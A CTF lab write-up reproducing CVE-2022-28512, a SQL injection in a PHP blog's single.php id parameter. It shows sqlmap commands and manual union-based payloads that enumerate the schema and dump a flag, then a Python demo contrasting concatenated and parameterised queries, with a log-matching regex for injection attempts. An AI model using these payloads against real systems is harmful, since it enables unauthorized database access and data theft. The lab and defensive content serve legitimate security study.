i春秋云镜 (ichunqiu cloud range) CVE-2022-28512 vulnerability reproduction notes

Published: 2023-05-22 14:44:55    Author: 糕冷のkecy

Injection with sqlmap

python sqlmap.py -u"http://eci-2zeeam96einfrib3wg1g.cloudeci1.ichunqiu.com/single.php?id=4" --batch --current-db -p"id"

Database name obtained:
[13:53:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:53:03] [INFO] fetching current database
current database: 'ctf'

python sqlmap.py -u"http://eci-2zeeam96einfrib3wg1g.cloudeci1.ichunqiu.com/single.php?id=4" --batch -D ctf --tables

Table names obtained:
Database: ctf
[14 tables]
+-----------------------------+
| banner_posts |
| blog_categories |
| blogs |
| editors_choice |
| flag |
| links |
| membership_grouppermissions |
| membership_groups |
| membership_userpermissions |
| membership_userrecords |
| membership_users |
| page_hits |
| titles |
| visitor_info |
+-----------------------------+

The key table, flag, is visible in the list.

python sqlmap.py -u"http://eci-2zeeam96einfrib3wg1g.cloudeci1.ichunqiu.com/single.php?id=4" --batch -D ctf -T flag --columns

Column names obtained:

Database: ctf
Table: flag
[1 column]
+--------+---------------+
| Column | Type |
+--------+---------------+
| flag | varchar(1024) |
+--------+---------------+

python sqlmap.py -u"http://eci-2zeeam96einfrib3wg1g.cloudeci1.ichunqiu.com/single.php?id=4" --batch -D ctf -T flag -C flag --dump

Flag value obtained:
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{ba07fcfd-14cb-4bde-af09-18458b4eb7ed}


Manual injection:
id=4' order by 10 --+ returns an error (so the query has fewer than 10 columns)
id=4' union select 1,2,3,4,5,6,7,8,9 --+ column 4 is the echo point (its value is shown on the page)
id=-4' union select 1,2,3,database(),5,6,7,8,9 --+ the current database is ctf

Enumerating table names:
id=-4' union select 1,2,3,table_name ,5,6,7,8,9 from information_schema.tables where table_schema=database() limit 0,1 --+ titles
id=-4' union select 1,2,3,table_name ,5,6,7,8,9 from information_schema.tables where table_schema=database() limit 1,1 --+ page_hits
...
id=-4' union select 1,2,3,table_name ,5,6,7,8,9 from information_schema.tables where table_schema=database() limit 10,1 --+ flag (the key table)

/* Alternatively, run id=-4' union select 1,2,3,group_concat(table_name) ,5,6,7,8,9 from information_schema.tables where table_schema=database() --+
directly; this single query also finds it */

Enumerating column names:
id=-4' union select 1,2,3,column_name ,5,6,7,8,9 from information_schema.columns where table_name='flag' limit 0,1 --+ flag (the key column)

Dumping the data:
id=-4' union select 1,2,3,flag ,5,6,7,8,9 from flag --+
Flag obtained:
flag{ba07fcfd-14cb-4bde-af09-18458b4eb7ed}
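The root cause behind both the sqlmap run and the manual union queries above is that single.php splices the id parameter straight into the SQL string. The following is an added example (not code from the write-up or from the affected CMS) that rebuilds that pattern on an in-memory SQLite database with a constructed schema: one function concatenates the input the way the vulnerable page does, the other binds it as a parameter, and both are fed the same union payload shape used in the manual section. A small log-scanning helper over constructed access-log lines shows how the URL-encoded form of that payload looks to a defender. The table names, rows, log lines and the flag value are all made up for the demo; the real target is MySQL, so database() and information_schema are not available in SQLite and the payload is reduced to the 4-column demo table.

```python
import re
import sqlite3
from urllib.parse import unquote_plus


def build_db():
    # Constructed stand-in for the blog database (not the real ctf schema).
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE blogs (id INTEGER, title TEXT, body TEXT, author TEXT);
        INSERT INTO blogs VALUES (4, 'Fourth post', 'hello world', 'admin');
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('flag{constructed-demo-value}');
    """)
    return conn


def fetch_post_vulnerable(conn, post_id):
    # Mirrors the single.php?id= pattern: untrusted input is pasted into the SQL text,
    # so a quote in the input closes the literal and the rest is parsed as SQL.
    sql = f"SELECT id, title, body, author FROM blogs WHERE id='{post_id}'"
    return conn.execute(sql).fetchall()


def fetch_post_safe(conn, post_id):
    # Parameterised query: the value is bound separately from the SQL text, so the
    # quote and the UNION keyword inside it are plain data, never SQL syntax.
    sql = "SELECT id, title, body, author FROM blogs WHERE id=?"
    return conn.execute(sql, (post_id,)).fetchall()


# Same shape as the page's "-4' union select ... from flag --+" payload, reduced to the
# 4-column demo table. "--+" in a URL decodes to "-- " (comment plus trailing space).
PAYLOAD = "-4' union select 1,2,flag,4 from flag -- "


def demo():
    # Returns (rows from the vulnerable query, rows from the parameterised query).
    conn = build_db()
    return fetch_post_vulnerable(conn, PAYLOAD), fetch_post_safe(conn, PAYLOAD)


# Detection side: flag requests whose decoded query string carries a UNION SELECT
# or an information_schema reference, which is what the manual enumeration emits.
UNION_RE = re.compile(r"union\s+(all\s+)?select|information_schema\.", re.IGNORECASE)

# Constructed access-log lines (not from the page); the second carries the payload shape.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/May/2023:13:53:03 +0800] "GET /single.php?id=4 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [22/May/2023:13:53:05 +0800] "GET /single.php?id=-4%27+union+select+'
    '1,2,3,database(),5,6,7,8,9+--+ HTTP/1.1" 200 4870',
]


def suspicious_requests(log_lines):
    # Returns the decoded request paths that match the injection pattern.
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        path = unquote_plus(m.group(1))  # %27 -> ', + -> space
        if UNION_RE.search(path):
            hits.append(path)
    return hits


if __name__ == "__main__":
    vuln, safe = demo()
    print("vulnerable query returned:", vuln)
    print("parameterised query returned:", safe)
    print("flagged requests:", suspicious_requests(SAMPLE_LOG))
```

Running it shows the concatenated query handing back the flag row through the union while the bound version returns nothing for the same input; the fix for this class of bug is the second function, not input filtering. The log check is deliberately narrow (UNION SELECT and information_schema only) and should be treated as a starting signature, since URL-decoding before matching is what makes the "+" and "%27" in the request line readable.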